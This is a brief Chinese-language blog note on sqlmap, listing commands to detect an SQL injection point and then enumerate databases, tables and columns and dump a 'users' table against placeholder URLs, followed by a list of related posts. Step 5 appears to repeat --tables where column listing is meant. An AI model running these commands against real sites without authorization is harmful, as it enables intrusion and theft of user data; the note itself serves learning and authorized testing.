Sqlmap使用

Lyx-06072024-05-03 9:43

sqlmap -u "http://example.com/index.php?id=1" --tables sqlmap查看表名

1、检测「注入点」

sqlmap -u 'http://xx/?id=1'

2、查看所有「数据库」

sqlmap -u 'http://xx/?id=1' --dbs

3、查看当前使用的数据库

sqlmap -u 'http://xx/?id=1' --current-db

4、查看「数据表」

sqlmap -u 'http://xx/?id=1' -D 'security' --tables

5、查看「字段」

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --tables

6、查看「数据」

sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump

相关推荐
Ab_stupid13 小时前
CTF-WEB培训笔记
笔记·web
逸模13 小时前
逸模 VS CAD+SU系列(二)施工图:告别手动改图,全专业图纸自动生成
笔记·其他·cad·su·施工图
Ab_stupid13 小时前
CTF-Android培训笔记
android·笔记
chushiyunen14 小时前
高斯数据库笔记、gaussDb
数据库·笔记
小杰~14 小时前
【个人笔记】VuePress Theme Plume 主题全解析 + 快速上手教程
笔记
whyTeaFo14 小时前
MIT 6.1810: xv6 book Chapter7: Locking 笔记
笔记
数智工坊15 小时前
周志华《Machine Learning》学习笔记--第十五章--规则学习
笔记·学习·机器学习
萤萤七悬16 小时前
【Python笔记】AI帮封装Airtest IOS-WDA touch操作时的factor坐标转换
笔记·python·ios
一口吃俩胖子16 小时前
【脉宽调制DCDC功率变换学习笔记024】电压反馈补偿和环路增益
笔记·学习·算法
San813_LDD17 小时前
[深度学习]量化研究_ML_Lesson3
笔记
热门推荐
01《置身钉内》原文-可播放阅读02Claude Code、Codex、Cursor三分天下:2026年AI编程Agent生态全景剖析03GitHub 镜像站点04【AI】2026 年具身智能模型和世界模型总结05AI科技热点日报 | 2026年6月1日062026 AI 编程工具终极实战指南:Cursor vs Claude Code vs Copilot,开发者该怎么选?07HTTP 与 HTTPS 的区别:从原理到实战详解082026年6月AI行业全景:从百模大战到Agent元年,这30天发生了什么?09Codex 下载安装指南:Windows 和 macOS 官方版下载102026 年 AI 编程工具终极横评:Cursor vs Claude Code vs Copilot vs Windsurf